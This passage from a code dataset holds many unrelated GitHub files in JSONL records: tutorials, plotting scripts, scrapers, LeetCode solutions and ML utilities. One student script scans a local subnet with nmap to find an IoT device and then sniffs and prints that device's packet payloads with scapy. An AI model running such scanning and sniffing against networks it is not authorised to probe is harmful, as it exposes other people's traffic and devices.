title:\n return True\n return False\n attr_counter_2(source_path, function)\n\nif __name__ == '__main__':\n # use_content_extractor()\n # use_attr_extractor()\n source_path = './data/dataset/all/java-a1-s1-len-lte-1000-match-gao-code-only.jsonl'\n # source_path = './data/dataset/all/java-a1-s1-len-lte-1000-match-gao.jsonl'\n # java_lines = 63056\n # construct_3_datasets(source_path, 54289)\n # construct_3_datasets_by_date('./data/dataset/all/python-a1-s2-len-lte-1000.jsonl', 225906, 211537, 225906)\n source_path = './data/dataset/all/python-a3-s2-len-lte-1000.jsonl'\n python_lines = 66439\n # construct_3_datasets(source_path, python_lines)\n # token_len_counter(source_path, python_lines)\n # interrogative_counter()\n ","repo_name":"zfj1998/XXSO_Data_Toolkit","sub_path":"dataset_construct.py","file_name":"dataset_construct.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21243136431","text":"import unittest\nfrom zeppos_ms_sql_server_proxy.extract_to_csv import ExtractToCsv\n\n\nclass TestTheProjectMethods(unittest.TestCase):\n def test_get_execute_methods(self):\n extract_to_csv = ExtractToCsv.execute(\n connection_string=\"DRIVER={ODBC Driver 17 for SQL Server}; SERVER=localhost\\sqlexpress; DATABASE=master; Trusted_Connection=yes;App=Test;\",\n sql_statement=\"select * from information_schema.columns\",\n csv_root_directory=r\"c:\\temp\\ms_sql_server_proxy\",\n csv_file_name=\"test_file.csv\"\n )\n self.assertEqual(201, extract_to_csv.status_code)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"changrunner/zeppos_ms_sql_server_proxy","sub_path":"tests/test_extract_to_csv.py","file_name":"test_extract_to_csv.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23833617189","text":"#-*- coding: utf-8 -*-\n\n# Example of Error\n\"\"\"\n2013 * (1229/0)\n=> ZeroDivisionError: division by zero\nopen('notfind.txt', 'r')\n=> FileNotFoundError: [Errno 2] No such file or directory: 'notfind.txt'\nlst = [1, 2, 3, 4]\nprint(lst[5])\n=> IndexError: list index out of range\n\"\"\"\n\n# try ~ except\ntry:\n b = 10 / 0\nexcept ZeroDivisionError:\n print('제수는 0이 될 수 없습니다!')\n'''\n제수는 0이 될 수 없습니다!\n'''\n\ntry:\n a = int(input(\"첫번째 숫자를 입력하세요: \"))\n b = int(input(\"두번째 숫자를 입력하세요: \"))\n print(\"a + b = \", a + b)\nexcept ValueError:\n print('값이 적절하지 않습니다.')\n'''\n첫번째 숫자를 입력하세요: 1\n두번째 숫자를 입력하세요: 영\n값이 적절하지 않습니다.\n'''\n\ntry:\n a = int(input(\"피제수를 입력하세요: \"))\n b = int(input(\"제수를 입력하세요: \"))\n print(\"a / b = \", a / b)\nexcept (ValueError, ZeroDivisionError):\n print('제수가 0이거나 값이 적절하지 않습니다.')\n'''\n피제수를 입력하세요: 4\n제수를 입력하세요: 영\n제수가 0이거나 값이 적절하지 않습니다.\n'''\n\"\"\"\ntry:\n a = 50 / \"이십\"\nexcept TypeError as e:\n print('예외 처리 결과 :', e.args[0]\n\n=> 예외 처리 결과 : unsupported operand type(s) for /: 'int' and 'str'\n\"\"\"\n\n# else : 예외가 발생하지 않을 경우 실행\ntry:\n f = open('gugudan.txt', 'r')\nexcept IOError:\n print('파일을 열지 못했습니다.')\nelse:\n print('gugudan.txt:\\n', f.read())\n f.close()\n'''\ngugudan.txt:\n 2 * 1 = 2\n2 * 2 = 4\n2 * 3 = 6\n2 * 4 = 8\n2 * 5 = 10\n2 * 6 = 12\n2 * 7 = 14\n2 * 8 = 16\n2 * 9 = 18\n'''\n\n# finally : 예외 발생 여부와 상관없이 무조건 실행\ntry:\n a = 10 / 0\nexcept ZeroDivisionError:\n print('제수는 0이 될 수 없습니다!')\nfinally:\n print('무조건 실행되는 영역!')\n'''\n제수는 0이 될 수 없습니다!\n무조건 실행되는 영역!\n'''\n\n# raise : 의도적으로 개발자가 예외를 발생시켜야 할 경우 raise 구문을 통하여 해당하는 예외를 강제로 발생\ntry:\n a = int(input('피제수를 입력하세요: '))\n b = int(input('제수를 입력하세요: '))\n if a <= 0 or b <= 0:\n raise ArithmeticError('피제수 혹은 제수가 0 이하일 수 없습니다.')\nexcept ArithmeticError as e:\n print('예외 발생:', e.args[0])\n'''\n피제수를 입력하세요: 2\n제수를 입력하세요: 0\n예외 발생: 피제수 혹은 제수가 0 이하일 수 없습니다.\n'''\n","repo_name":"BKJang/I-Studied","sub_path":"Python/17_Exception.py","file_name":"17_Exception.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74682493030","text":"import sys\r\nimport nmap\r\nimport time\r\nimport os\r\nfrom scapy.all import *\r\n\r\npacket_count = 0\r\n\r\nnm = nmap.PortScanner() # 네트워크 스캐너를 사용하여 iot 기기의 IP 주소를 스캔\r\nnm.scan(\"192.168.35.0/24\") # 네트워크 주소 범위 지정\r\n\r\n# iot 기기의 IP 주소 선택\r\niot_ip = None\r\nfor host in nm.all_hosts():\r\n # iot 기기의 특정 포트 번호가 열려있는지 확인\r\n if nm[host].has_tcp(80) and nm[host][\"tcp\"][80][\"state\"] == \"open\":\r\n iot_ip = host\r\n break\r\n\r\nif iot_ip is None:\r\n print(\"IoT 기기를 찾을 수 없습니다.\")\r\nelse:\r\n print(\"IoT 기기의 IP 주소: \", iot_ip)\r\n\r\ndef handle_packet(packet):\r\n global packet_count\r\n src = packet[IP].src\r\n dst = packet[IP].dst\r\n length = packet[IP].len\r\n checksum = packet[IP].chksum\r\n \r\n if packet.haslayer(TCP):\r\n # TCP packet analysis code\r\n sport = packet[TCP].sport\r\n dport = packet[TCP].dport\r\n data = packet[TCP].payload.load if hasattr(packet[TCP].payload, 'load') else b'' # Check if payload exists\r\n print(f\"TCP packet: source={src}, source_port={sport}, destination={dst}, destination_port={dport}, length={length}, checksum={checksum}, data={data}\")\r\n packet_count += 1\r\n\r\n if packet.haslayer(UDP):\r\n # UDP packet analysis code\r\n sport = packet[UDP].sport\r\n dport = packet[UDP].dport\r\n data = packet[UDP].payload.load if hasattr(packet[UDP].payload, 'load') else b'' # Check if payload exists\r\n print(f\"UDP packet: source={src}, source_port={sport}, destination={dst}, destination_port={dport}, length={length}, checksum={checksum}, data={data}\")\r\n packet_count += 1\r\n\r\n\r\nsniffingTime = input(\"Sniffing Time: \") # 몇 초간 패킷 캡쳐할 것인지\r\nif iot_ip:\r\n print(\"프로그램 시작\")\r\n # pcap_file = sniff(prn=handle_packet, timeout=int(sniffingTime), filter=f\"host {iot_ip}\")\r\n sniff(prn=handle_packet, timeout=int(sniffingTime), filter=f\"host {iot_ip}\")\r\n print(\"Finish Capture Packet\")\r\n if packet_count == 0: # No packets captured\r\n print(\"No Packet\")\r\n sys.exit()\r\n else:\r\n packet_rate = packet_count / float(sniffingTime)\r\n print(\"Total Packet: %s\" % packet_count)\r\n print(\"Packets per second: %.2f\" % packet_rate)\r\n # file_name = input(\"Enter File Name: \")\r\n # wrpcap(file_name, pcap_file) # Save as a pcap file\r\n\r\nelse:\r\n print(\"프로그램을 실행할 수 없습니다.\")\r\n\r\n# pcap 파일 읽어서 패킷 크기 구하기\r\n'''\r\ndef getSize(file_name):\r\n packets = rdpcap(file_name)\r\n packet_size = [len(packet) for packet in packets]\r\n return packet_size\r\n \r\npacketSize = getSize(file_name)\r\ntotalSize = sum(packetSize)\r\nbyte_rate = totalsize / float(sniffingTime)\r\nprint(f\"Total Packet Size: %s\" % totalSize)\r\nprint(f\"Packet Size per Second: %.2f bytes/sec\" % byte_rate)\r\n'''\r\n \r\n\r\n","repo_name":"326eunjin/network_programming","sub_path":"project2.py","file_name":"project2.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36801625588","text":"from datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\nd = datetime.today()\ndriver = webdriver.Chrome(r'C:\\Users\\hwans\\Develop\\Python\\crawling\\chromedriver.exe')\n\nfile_path = f'C:/Users/hwans/Develop/Python/crawling/교보문고 베스트셀러 {d.year}_{d.month}_{d.day}.html'\n\n\ndriver.get('http://www.kyobobook.co.kr/index.laf')\ndriver.find_element_by_xpath('//*[@id=\"header\"]/div[3]/ul[2]/li[1]/a').click();\n\nsrc = driver.page_source\nsoup = BeautifulSoup(src,'html.parser')\ndiv_list = soup.find_all('div',class_='detail')\n\n \nwith open(file_path,'w') as f:\n f.write('')\n f.write('')\n f.write('')\n f.write('교보문고 베스트셀러 1~20위')\n f.write('')\n f.write('')\n f.write('')\n f.write('교보문고 베스트셀러 1~20위

')\n rank = 0\n for div in div_list:\n rank+=1\n f.write('')\n f.write(f'순위: {rank}
')\n book = div.find('div', class_='title')\n book_link = book.find('a')\n f.write(f'{book_link}')\n f.write('


')\n f.write('')\n f.write('')","repo_name":"hwans21/python","sub_path":"Day06/kyobo_url.py","file_name":"kyobo_url.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26478508581","text":"from collections import deque\ndef solution(cacheSize, cities):\n answer = 0\n q = deque(maxlen=cacheSize)\n if cacheSize == 0:\n answer = 5 * len(cities)\n else:\n for i in range(len(cities)):\n # q안에 이미 있으면 빼주기\n if cities[i].lower() in q:\n q.remove(cities[i].lower())\n q.append(cities[i].lower())\n answer += 1\n continue\n else:\n q.append(cities[i].lower())\n answer += 5\n print(answer)\n return answer\nsolution(3, [\"Jeju\", \"Pangyo\", \"Seoul\", \"Jeju\", \"Pangyo\", \"Seoul\", \"Jeju\", \"Pangyo\", \"Seoul\"])","repo_name":"HyeseungNA/algorithm_prac","sub_path":"programmers/17680.py","file_name":"17680.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31591224613","text":"import utils.freq_sweep as freq_sweep\n\n# FREQ SWEEP PARAMETERS\nsweep_time = 3 # frequency sweep lasts 3 seconds\nmin_freq = 20 # 20Hz\nmax_freq = 20000 # 20kHz\nsampling_rate = 100000 # 100kHz\n\ndef main():\n freq_sweep.plot_all_sweeps(sweep_time, sampling_rate, min_freq, max_freq)\n\nmain()","repo_name":"shreya-51/MScAML_group_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"69987927911","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport seaborn as sns\nimport geopandas as gpd\nfrom IPython.display import Image\nfrom bokeh.plotting import figure, output_notebook, show, output_file\nfrom bokeh.io import output_notebook, output_file\nfrom bokeh.models import ColumnDataSource, HoverTool, CustomJS\nfrom bokeh.models.widgets import Select\nfrom bokeh.transform import factor_cmap\nfrom bokeh.layouts import column as bokeh_column\nfrom bokeh.models import TabPanel\nfrom bokeh.models import Legend\nfrom country_name import *\n\n# Load and preprocess data\ndf = pd.read_csv('data/clean_combined.csv')\n\n# Filter and reshape data for 'World'\ndf_world = df[df['Entity'] == 'World']\ndf_world = df_world.melt(id_vars=['Entity', 'Code', 'Year'], \n value_vars=['Cropland', 'Pasture', 'Permanent ice', 'Semi-natural land', 'Urban', 'Villages', 'Wild barren land', 'Wild woodlands'], \n var_name='Land_type', \n value_name='Area_Aggregated_Categories')\n\n# Drop rows with NaN values\ndf_world = df_world.dropna(subset=['Area_Aggregated_Categories'])\n\n\ndf_world['Year'] = df_world['Year'].astype(int)\n\n# Group and pivot data\ndf_world = df_world[df_world['Year'] >= 200]\ndf_world = df_world.groupby(['Year', 'Land_type'])['Area_Aggregated_Categories'].sum().reset_index()\ndf_world = df_world.pivot(index='Year', columns='Land_type', values='Area_Aggregated_Categories').fillna(0)\n\n# Convert to percentages\ndf_world = df_world.divide(df_world.sum(axis=1), axis=0) * 100\n\n# Plot chart 1\n# Define a custom color palette using hex color codes\ncustom_palette = {\n 'Cropland': '#FF8D85', # Dark orange\n 'Pasture': '#B22222', # Firebrick\n 'Wild barren land': '#FFD700', # Gold\n 'Permanent ice': '#4073FF', # Light sky blue\n 'Wild woodlands': '#064E40', # Forest green\n 'Semi-natural land':'#6ACCBC', \n 'Urban': '#808080', # Gray\n 'Villages': '#804000' # Gray\n}\n\n# Create a new figure\nplt.figure(figsize=(16, 9))\n#plt.suptitle('Chart 1', fontsize=20, y=1.03)\n\n\n# Initialize a variable to store the cumulative sum\ncumulative_sum = np.zeros_like(df_world.iloc[:, 0])\n\n# Plot a stacked area chart\nfor column in df_world.columns:\n plt.fill_between(df_world.index, cumulative_sum, cumulative_sum + df_world[column], color=custom_palette.get(column, 'lightgray'), alpha=0.4)\n cumulative_sum += df_world[column]\n \n# Set labels and title\nplt.xlabel('Year', fontsize=14)\nplt.ylabel('Percentage of Total Land Mass (%)', fontsize=14)\nplt.title('Change in Global Land Use Over Time (AD 200 to Present)', fontsize=16)\n\nplt.grid(True)\nplt.legend(df_world.columns, loc='upper left')\n\nplt.show()\n\n\nprint(\"earth habitable land area\")\nImage(url= \"image/earth.jpeg\", width=800, height=700)\n\n# Load photo\nagriculture_data = pd.read_csv('data/habitable-land-needed.csv')\nworld_map = gpd.read_file('image/ne_10m_admin_0_countries.shp')\n\n\nworld_map['SOVEREIGNT'] = world_map['SOVEREIGNT'].replace(country_name_corrections)\n\n# Remove leading/trailing spaces\nworld_map['SOVEREIGNT'] = world_map['SOVEREIGNT'].str.strip()\nagriculture_data['Entity'] = agriculture_data['Entity'].str.strip()\n\n# Separate 'World' data\nworld_data = agriculture_data[agriculture_data['Entity'] == 'World']\ncountry_data = agriculture_data[agriculture_data['Entity'] != 'World']\n\n\n# Add missing countries\nmissing_countries_df = pd.DataFrame(missing_countries, columns=['Entity'])\nmissing_countries_df['HALF Index (habitable land area) (Alexander et al. (2016))'] = np.nan\nagriculture_data = pd.concat([agriculture_data, missing_countries_df], ignore_index=True)\n\n\n# Merge dataframes\nmerged_data = world_map.merge(agriculture_data, how='left', left_on='SOVEREIGNT', right_on='Entity')\n\n# Include 'World' data\nworld = pd.concat([merged_data, world_data])\n\n# Calculate world average\nworld_average = world_data['HALF Index (habitable land area) (Alexander et al. (2016))'].values[0]\n\n# Add the title and the description\n# plt.suptitle(\"Share of global habitable land needed if everyone had the diet of...\", fontsize=14, fontweight='bold')\n\nprint(\"Share of global habitable land needed if everyone had the diet of...\")\n# Assign color categories\nworld['color_category'] = np.where(\n world['HALF Index (habitable land area) (Alexander et al. (2016))'].isnull(), 'no_data',\n np.where(world['HALF Index (habitable land area) (Alexander et al. (2016))'] < world_average, 'blue',\n np.where(world['HALF Index (habitable land area) (Alexander et al. (2016))'] <= 99, 'yellow', 'red')))\n\n# Map color categories to actual colors\ncolor_mappings = {'blue': '#96ceb4', 'yellow': '#ff9966', 'red': '#d9534f', 'no_data': '#7f7f7f'}\nworld['color'] = world['color_category'].map(color_mappings)\n\n# Plot\nfig, ax = plt.subplots(1, 1, figsize=(10, 10))\nworld[world['color_category'] != 'no_data'].geometry.plot(facecolor=world[world['color_category'] != 'no_data']['color'], ax=ax)\nworld[world['color_category'] == 'no_data'].geometry.plot(facecolor='none', edgecolor='grey', hatch='////', ax=ax)\n\n# Legend\nlegend_labels = {\n '#96ceb4': 'Less than currently used',\n '#ff9966': 'Greater than currently used',\n '#d9534f': 'Not possible with global land',\n 'grey': 'No data'\n}\nlegend_handles = [mpatches.Patch(color=color, label=label, hatch='////' if color == 'grey' else None) for color, label in legend_labels.items()]\nplt.legend(legend_handles, legend_labels.values(), title='HALF Index (habitable land area)', loc='lower right')\n\n# Remove x and y axis marks\nax.set_xticks([])\nax.set_yticks([])\n\nplt.show()\n\n# Ensure output_notebook() is called in the same cell\n# output_notebook()\noutput_file(\"output_plot.html\")\n\n# Create 'Proportion Allocated to Animal Feed' and 'Proportion Allocated to Other Uses' columns\ndf['Total Cereal Allocation'] = df[['Cereals allocated to other uses', 'Cereals allocated to animal feed', 'Cereals allocated to human food']].sum(axis=1)\ndf['Proportion Allocated to Human Food'] = df['Cereals allocated to human food'] / df['Total Cereal Allocation']\ndf['Proportion Allocated to Animal Feed'] = df['Cereals allocated to animal feed'] / df['Total Cereal Allocation']\ndf['Proportion Allocated to Other Uses'] = df['Cereals allocated to other uses'] / df['Total Cereal Allocation']\n\n# Convert proportions to percentages\nfor column in ['Proportion Allocated to Human Food', 'Proportion Allocated to Animal Feed', 'Proportion Allocated to Other Uses']:\n df[column] *= 100\n\n# Filter the DataFrame\ndf_large_population = df[~df['Entity'].isin(small_population_countries)]\n\n# Get column names\ncolumn_names = df_large_population.columns.tolist()\n\n# Remove rows with missing values in relevant columns\ndf_remove_na = df_large_population.dropna(subset=['Cereals allocated to other uses', \n 'Cereals allocated to animal feed', \n 'Cereals allocated to human food', 'Year', 'Entity'])\n\ndf_clean = df_remove_na.drop(['Cropland',\n 'Pasture',\n 'Permanent ice',\n 'Semi-natural land',\n 'Urban',\n 'Villages',\n 'Wild barren land',\n 'Wild woodlands'], axis=1)\n\n# Convert 'Year' to int\ndf_clean['Year'] = df_clean['Year'].astype(int)\n\n\n# Create a list of unique countries\ncountries = df_clean['Entity'].unique()\n\n\n\n# Create a ColumnDataSource for each country\nsources = {country: ColumnDataSource(df_clean[df_clean['Entity'] == country]) for country in countries}\n\n# Create the initial figure\np = figure(width=1000, height=500, x_axis_type=\"linear\", title=countries[0])\np.xaxis.axis_label = 'Year'\np.yaxis.axis_label = 'Cereal Allocation (%)'\n\n# Define the stack order and colors\nstacks = ['Proportion Allocated to Human Food', 'Proportion Allocated to Animal Feed', 'Proportion Allocated to Other Uses']\n# Define a custom color palette\ncolors = [\"#FFB6C1\", \"#9370DB\", \"#ADD8E6\"]\nlegend_labels = ['Human Food', 'Animal Feed', 'Other Uses']\n\n\n# Add varea_stack to the plot\nrenderers = p.varea_stack(stacks, x='Year', color=colors, alpha=0.6, source=sources[countries[0]])\n\n# Create a Legend\nlegend = Legend(items=[(label, [r]) for label, r in zip(legend_labels, renderers)], location=\"top_left\", click_policy=\"hide\")\n\n# Add the legend to the plot\np.add_layout(legend)\n\n\nhover = HoverTool(\n tooltips=[\n (\"Year\", \"@Year\"),\n (\"Human Food (%)\", \"@{Proportion Allocated to Human Food}\"),\n (\"Animal Feed (%)\", \"@{Proportion Allocated to Animal Feed}\"),\n (\"Other Uses (%)\", \"@{Proportion Allocated to Other Uses}\")\n ]\n)\np.add_tools(hover)\n\n# Create a Select widget for country selection\ncountry_select = Select(value=countries[0], options=list(countries))\n\n# Define a CustomJS callback for the Select widget\ncallback = CustomJS(args=dict(sources=sources, plot=p), code=\"\"\"\n var country = cb_obj.value;\n plot.title.text = country;\n plot.renderers[0].data_source.data = sources[country].data;\n plot.change.emit();\n\"\"\")\ncountry_select.js_on_change('value', callback)\n\n# Show the plot and the Select widget\nshow(bokeh_column(country_select, p))\n\nprint(\" In Europe less than one-third of cereal production is used for human consumption, and in the US only 10 percent is.\")\n","repo_name":"Niveusgh/Global-Land-Change","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19756037001","text":"#coding=utf-8\n# File : cut_mfcc.py\n# Time : 2021/09/03 14:18:55\n# Author : Jinghan Peng\n# Desciption: 根据feats.scp和target.lst,切割特征,生成新的feat和target的ark和scp\n\n\nimport os\nimport kaldiio\nimport kaldi_io\nimport numpy as np\nfrom tqdm import tqdm\nimport collections\n\ndef main():\n featsscp_path = \"/data/pengjinghan/origin_data/mandarin/1c_8kHz_audio/mfcc/data/feats.scp\"\n targetlst_path = \"/data/pengjinghan/origin_data/mandarin/1c_8kHz_audio/target.lst\"\n out_dir = \"/data/pengjinghan/tsvad/segment\"\n \n os.makedirs(out_dir, exist_ok=True)\n\n segment_size = 1600 # 16秒 = 1600帧\n \n \"\"\"读取target.lst\"\"\"\n utt2target = collections.defaultdict(dict)\n with open(targetlst_path, 'r') as rf:\n for line in tqdm(rf.readlines()):\n line = line.strip().split()\n spk = line[0]\n utt = spk[:spk.rfind('_')]\n target = [int(i) for i in line[1:]]\n target = np.array(target, dtype='float32')\n utt2target[utt][spk] = target\n\n \"\"\"读取feats.scp,进行切割并写入ark和scp\"\"\"\n feat_ark_scp = f'ark:| copy-feats --compress=true ark:- ark,scp:{out_dir}/feats.ark,{out_dir}/feats.scp'\n target_ark_scp = f'ark:| copy-feats --compress=true ark:- ark,scp:{out_dir}/target.ark,{out_dir}/target.scp'\n\n with open(featsscp_path, 'r') as rf, \\\n kaldi_io.open_or_fd(feat_ark_scp, 'w') as wf1, \\\n kaldi_io.open_or_fd(target_ark_scp, 'w') as wf2:\n for line in tqdm(rf.readlines()):\n utt, path = line.strip().split()\n feat = kaldiio.load_mat(path)\n nframes = feat.shape[0]\n\n target = utt2target[utt]\n spks = list(target.keys())\n \n steps = nframes//segment_size\n for i in range(steps):\n frame_str = \"{:>06}_{:>06}\".format(i*segment_size, (i+1)*segment_size)\n # 特征\n new_feat_utt = f\"{utt}-{frame_str}\" \n segment_feat = feat[i*segment_size:(i+1)*segment_size]\n kaldi_io.write_mat(wf1, segment_feat, key=new_feat_utt)\n\n # 标签\n for spk in spks:\n new_target_utt = f\"{spk}-{frame_str}\"\n segment_target = np.expand_dims(target[spk][i*segment_size:(i+1)*segment_size], 0) # kaldi的ark必须是2维numpy\n kaldi_io.write_mat(wf2, segment_target, key=new_target_utt)\n\n # \"\"\"查看ark\"\"\"\n # /data/liumin/speakin-kaldi/src/featbin/copy-feats ark:target.ark ark,t:- | less\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NeoBryant/audio_tools","sub_path":"tsvad/cut_feats.py","file_name":"cut_feats.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41558621592","text":"\"\"\"Modelling craft failure using Bayesian Belief Network.\n\nThomas Dickson\nthomas.dickson@soton.ac.uk\n22/05/2018\n\"\"\"\n\nfrom pgmpy.models import BayesianModel\nfrom pgmpy.factors.discrete import TabularCPD\nfrom pgmpy.inference import BeliefPropagation\nfrom numba import jit\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wind_speed(tws):\n \"\"\"Wind speed failure function.\"\"\"\n if tws > 25:\n return 1\n else:\n return 0\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wind_dir(twa):\n \"\"\"Wind direction failure function.\"\"\"\n if twa < 0.0:\n return 1\n else:\n return 0\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wave_height(h):\n \"\"\"Wave height failure function.\"\"\"\n if h > 3:\n return 1\n else:\n return 0\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wave_dir(theta):\n \"\"\"Wave direction failure function.\"\"\"\n if theta < 60.0:\n return 1\n else:\n return 0\n\n\n@jit(nogil=True, fastmath=True)\ndef gen_env_model():\n \"\"\"Specify BBN.\"\"\"\n cpd_tws = TabularCPD('TWS', 2, values=[[0.8, 0.2]])\n cpd_twa = TabularCPD('TWA', 2, values=[[0.8, 0.2]])\n cpd_wind = TabularCPD('Wind', 2,\n # values=[[1, 0.1, 0.1, 0.0],\n # [0.0, 0.9, 0.9, 1.0]],\n values = [[1, 0.999, 0.999, 0.998],\n [0.0, 0.001, 0.001, 0.002]], # min\n evidence=['TWA', 'TWS'],\n evidence_card=[2, 2])\n cpd_wh = TabularCPD('WH', 2, values=[[0.8, 0.2]])\n cpd_wd = TabularCPD('WD', 2, values=[[0.8, 0.2]])\n cpd_waves = TabularCPD('Waves', 2,\n values=[[1, 0.1, 0.1, 0.0], # normal vals\n [0.0, 0.9, 0.9, 1.0]],\n # values = [[1, 0.999, 0.999, 0.998],\n # [0.0, 0.001, 0.001, 0.002]], # min failure\n evidence=['WH', 'WD'],\n evidence_card=[2, 2])\n cpd_fail = TabularCPD('Craft failure', 2,\n values=[[1.0, 0.1, 0.1, 0.0],\n [0.0, 0.9, 0.9, 1.0]],\n evidence=['Waves', 'Wind'],\n evidence_card=[2, 2])\n model = BayesianModel([('TWS', 'Wind'), ('TWA', 'Wind'),\n ('WH', 'Waves'), ('WD', 'Waves'),\n ('Waves', 'Craft failure'),\n ('Wind', 'Craft failure')])\n model.add_cpds(cpd_tws, cpd_twa, cpd_wind,\n cpd_wh, cpd_wd, cpd_waves, cpd_fail)\n belief_propagation = BeliefPropagation(model)\n return belief_propagation\n\n\n@jit(cache=True, nogil=True, fastmath=True)\ndef env_bbn_interrogate(bp, tws, twa, h, theta):\n \"\"\"\n Interrogate BBN for failure probability.\n\n Modelling failure as a function of environmental conditions.\n \"\"\"\n q = bp.query(variables=['Craft failure'],\n evidence={'TWS': wind_speed(tws),\n 'TWA': wind_dir(twa),\n 'WH': wave_height(h),\n 'WD': wave_dir(theta)})\n return q['Craft failure'].values[-1]\n\n\nif __name__ == '__main__':\n model = gen_env_model()\n print(\"No failure: \", env_bbn_interrogate(model, 10, 60, 0, 40))\n print(\"Wave direction condition: \", env_bbn_interrogate(model, 10, 60, 0, 10))\n print(\"Full wave failure: \", env_bbn_interrogate(model, 10, 60, 4, 10))\n print(\"Wind speed failure: \", env_bbn_interrogate(model, 40, 60, 4, 10))\n print(\"Wind cond failure: \", env_bbn_interrogate(model, 40, 10, 4, 10))\n","repo_name":"TAJD/pyroute","sub_path":"sail_route/performance/bbn.py","file_name":"bbn.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"74009680229","text":"# coding=utf-8\n\nfrom sqlalchemy.ext.declarative import ( #type:ignore\n as_declarative,\n declared_attr\n)\nfrom sqlalchemy import ( #type:ignore\n Column,\n Integer\n)\n\n\n@as_declarative()\nclass Base:\n __name__ = 'Base'\n\n id_ = Column('id', Integer(), primary_key=True)\n\n @declared_attr\n def __tablename__(cls) -> str: # pylint:disable=E0213\n return cls.__name__.lower() # pylint:disable=E1101\n","repo_name":"magiskboy/fastapi-webservice","sub_path":"app/db/base_class.py","file_name":"base_class.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"11243096398","text":"# -*- coding: UTF-8 -*-\n# https://leetcode-cn.com/problems/hua-dong-chuang-kou-de-zui-da-zhi-lcof/\nimport collections\n\ndef maxSlidingWindow(nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n res = []\n deque = collections.deque()\n n = len(nums)\n for i,j in zip(range(1-k,n+1-k),range(n)):\n if i>0 and nums[i-1]==deque[0]:\n deque.popleft()\n while deque and deque[-1]=0:\n res.append(deque[0])\n return res\n\nnums = [1,3,-1,-3,5,3,6,7]\nk = 3\nprint(maxSlidingWindow(nums,k))\n","repo_name":"lichengchengchloe/leetcodePracticePy","sub_path":"MaxSlidingWindow.py","file_name":"MaxSlidingWindow.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30453707096","text":"from django.urls import path, re_path\n\nfrom .views import Leaderboards, PlayerDetail, PlayerSearch\n\napp_name = \"baseball\"\n\nurlpatterns = [\n re_path(\n r\"(?P[\\w]*)-(?P[\\w]*)-leaders/\",\n Leaderboards.as_view(),\n name=\"leaderboards\",\n ),\n path(\"players//\", PlayerDetail.as_view(), name=\"batter-detail\"),\n path(\"players/search\", PlayerSearch.as_view(), name=\"player-search\"),\n]\n","repo_name":"TimESQuit/baseball-api-v3","sub_path":"baseball/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22352879695","text":"'''Given a linked list, determine if it has a cycle in it.\n\nTo represent a cycle in the given linked list, we use an integer pos which represents the position (0-indexed) in the\nlinked list where tail connects to. If pos is -1, then there is no cycle in the linked list.'''\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def hasCycle(self, head: ListNode) -> bool:\n temp = head\n while temp:\n if temp.val == '0':\n return True\n temp.val = '0'\n temp = temp.next\n return False","repo_name":"nishantchaudhary12/Leet_Code","sub_path":"Python/141_linkedListCycle.py","file_name":"141_linkedListCycle.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19478547453","text":"\n\nclass View(object):\n provider_class = None\n provider = None\n\n def __init__(self, request):\n self.request = request\n self.response = request.response\n self.context = request.context\n\n dbsession = request.dbsession\n settings = request.registry.settings\n\n if self.provider_class:\n self.provider = self.provider_class(dbsession, settings)\n","repo_name":"JesusAnaya/jesusanaya_blog","sub_path":"jesusanaya_blog/views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34623745101","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--path\")\nparser.add_argument(\"--mode\", required=False)\nparser.add_argument(\"--country\", required=False)\nparser.add_argument(\"--year\", required=False)\nparser.add_argument(\"--output\", 